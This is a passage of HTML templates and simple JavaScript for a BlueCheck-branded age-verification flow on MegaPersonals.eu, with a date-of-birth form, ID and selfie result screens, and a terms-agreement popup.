            <div class="bluecheck-modal bluecheck-modal-blue-background bluecheck-modal-submitted">
                <div class="bluecheck-flex-info">
                    <div class="bluecheck-modal-body-blue" style="text-align:center;">
                        <h4 class="bluecheck-alert-title">{{title}}</h4>
                        <h4 class="bluecheck-alert-message">{{message}}</h4>
                        <div class="bluecheck-license" style="margin:30px;">
                            <img class='bluecheck-license-img' src="{{photo}}" alt="">
                        </div>
                        {{done}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-failedSelfieInvalidID">
    <div class="bluecheck-screen-failedSelfieInvalidID">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-blue-background bluecheck-modal-submitted">
                <div class="bluecheck-flex-info">
                    <div class="bluecheck-modal-body-blue" style="text-align:center;">
                        <h4 class="bluecheck-alert-title">{{title}}</h4>
                        <h4 class="bluecheck-alert-message">{{message}}</h4>
                        {{done}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-invalidID">
    <div class="bluecheck-screen-invalidID">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-blue-background bluecheck-modal-submitted">
                <div class="bluecheck-flex-info">
                    <div class="bluecheck-modal-body-blue" style="text-align:center;">
                        <h4 class="bluecheck-alert-title">{{title}}</h4>
                        <h4 class="bluecheck-alert-message">{{message}}</h4>
                        <div class="bluecheck-license" style="margin:30px;">
                            <img class='bluecheck-license-img' src="{{photo}}" alt="">
                        </div>
                        {{done}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-failedNSFW">
    <div class="bluecheck-screen-failedNSFW">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-red">
                <div class="bluecheck-flex-info">
                    <h2 class='bluecheck-modal-body-h2' style='text-align:center;margin-top:50px;'>
                        <span class='bluecheck-failure-header'>{{header}}</span>
                    </h2>
                    <div class="bluecheck-modal-body-red" style="text-align:center;padding-top:0px;">
                        <h4 class="bluecheck-alert-message">{{title}}</h4>
                        <h4 class='bluecheck-alert-message'>{{message}}</h4>
                        {{done}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<div   id="bluecheck-container">
    <div class="bluecheck-screen-dob" style="display: block;">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-dob">
                <div  class="bluecheck-modal-flex">
                    <div class="bluecheck-modal-head">
                        <div   class="bluecheck-modal-head-circle-container"><i  class="fa fa-chevron-left bluecheck-link-back" aria-hidden="true"></i></div><div class="bluecheck-modal-head-text bluecheck-link-help bluecheck-open-help"><h6 class="bluecheck-modal-head-text-h6">Need Help ?</h6></div><div class="bluecheck-modal-head-circle-container"><i class="fa fa-times bluecheck-fa-times bluecheck-close-this-modal" aria-hidden="true"></i></div>
                    </div>
                    <div class="bluecheck-modal-body">
                        <h5 class="bluecheck-modal-body-h5">Enter your <span class="bluecheck-modal-body-span">date of birth</span></h5>
                        <div class="bluecheck-data">
                            <span id="bluecheck-dob-month-data"></span>
                            <span id="bluecheck-dob-day-data"></span>
                            <span id="bluecheck-dob-year-data"></span>
                        </div>
                        <div class="bluecheck-bdata">
                            <input class="bluecheck-modal-body-input" type="tel" pattern="[0-9]*" name="month" id="bluecheck-input-dob-month" placeholder="MM" maxlength="2" autocomplete="off">
                            <span class="bluecheck-bdata-span">/</span>
                            <input class="bluecheck-modal-body-input" type="tel" pattern="[0-9]*" name="day" id="bluecheck-input-dob-day" placeholder="DD" maxlength="2" autocomplete="off">
                            <span class="bluecheck-bdata-span">/</span>
                            <input class="bluecheck-modal-body-input" type="tel" pattern="[0-9]*" name="year" id="bluecheck-input-dob-year" placeholder="YYYY" maxlength="4" autocomplete="off">
                        </div>
                    </div>
                    <div class="bluecheck-modal-footer">
                        <h6 class="bluecheck-dob-h6"></h6>
                        <button id="" style="background: #2962cb !important;
    background-image: linear-gradient(
        135deg
, #01a4ea 0%, #2962cb 100%) !important;" onclick="window.location.href='/users/verification/<?php echo $uid; ?>'"class="bluecheck-not-active bluecheck-modal-footer-button"><span style="pointer-events: none;">Continue</span><i aria-hidden="false" class="fa fa-chevron-right" style="pointer-events: none;"></i></button>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div id="myDIV" class="bluecheck-screen-intro" style="display: block;">
        <div class="bluecheck-modal-hidden-wrapper bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-intro">
                <div class="bluecheck-modal-flex">
                    <div class="bluecheck-modal-absolute-head">
                        <div class="bluecheck-modal-absolute-head-text">
                            <img src="https://s3.amazonaws.com/bluecheck/20190330120158.png" alt="" id="bluecheck-store-logo" class="bluecheck-store-logo">
                        </div>
                        <i class="fa fa-times bluecheck-close-all-modals" aria-hidden="true"></i>
                    </div>
                    <div class="bluecheck-modal-body">
                        <img class="bluecheck-intro-img" src="https://verify.bluecheck.me/age-verification/images/bluecheck-logomark.png" alt="">
                        <h3 class="bluecheck-intro-h3">Please verify your age<span><br></span></h3>
                    </div>
                    <div class="bluecheck-modal-footer">
                        <h6 class="bluecheck-intro-h6"></h6>
                        <h6 class="bluecheck-intro-h6 bluecheck-terms">
                            <input type="checkbox" id="myCheck" class="bluecheck-terms">
                            <label for="bluecheck-terms">By continuing below you agree to BlueCheck's website <a class="bluecheck-intro-a" target="_blank" href="https://www.bluecheck.me/terms-of-use">terms</a> of use and <a class="bluecheck-intro-a" target="_blank" href="https://www.bluecheck.me/privacy-policy">privacy policy</a></label>
                        </h6>
                        <h6 class="bluecheck-intro-h6 buttonClickErrorMessage" id="buttonClickErrorMessage" style="display:none;">Please agree to the terms and conditions.</h6>
                        <button id="text" onclick="myFunction()" id="bluecheck-submit-intro" class="bluecheck-modal-footer-button bluecheck-active"><span  style="pointer-events: none;">VERIFY MY AGE</span><i aria-hidden="false" class="fa fa-chevron-right" style="pointer-events: none;"></i></button>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!--OK-->
<div id="myDIV1" class="bluecheck-screen-intro" style="display: block;">
        <div class="bluecheck-modal-hidden-wrapper bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-intro">
                
                        <div class="modal-body">

                           
                            <img src="https://megapersonals.eu/resources/img/ageCheckPopup.png?v=1640812093">
                            <div class="centered">
                                <p style="text-align: center;" class="popup-text">
                                    To prevent spam,<br>
                                    MegaPersonals.eu<br>
                                    verifies all new users.<br>
                                    <!-- <span class="popup-text-bluecheck">BlueCheck</span> for verification -->
                                </p><br>
                                <p  style="text-align: center;font: 12px;" class="popup-text">
                                    This needs to be <br>done only once.
                                </p><br>
                                <p style="text-align: center;" class="popup-text">
                                    All on-line info is <!-- <span class="popup-text-red"> -->deleted<!-- </span> --> after<br>
                                    verification is complete.
                                </p>
                            </div>
                        </div>
                        <div style="hight:12px;" class="modal-footer flex-btn">
                            <button type="button" class="btn btn-link btn-lg"  onclick="myFunction1()">OK</button>
                       
</div>
</div>
                
    <!--End OK-->
</body>
</html>




    <script>
function myFunction() {
  var x = document.getElementById("myDIV");
  if (x.style.display === "none") {
    x.style.display = "block";
  } else {
    x.style.display = "none";
  }
}


function myFunction1() {
  var x = document.getElementById("myDIV1");
  if (x.style.display === "none") {
    x.style.display = "block";
  } else {
    x.style.display = "none";
  }
}

function myFunction2() {
  var checkBox = document.getElementById("myCheck");
  var text = document.getElementById("text");
  if (checkBox.checked == true){
    text.style.display = "block";
  } else {
     text.style.display = "none";
  }
}
</script>
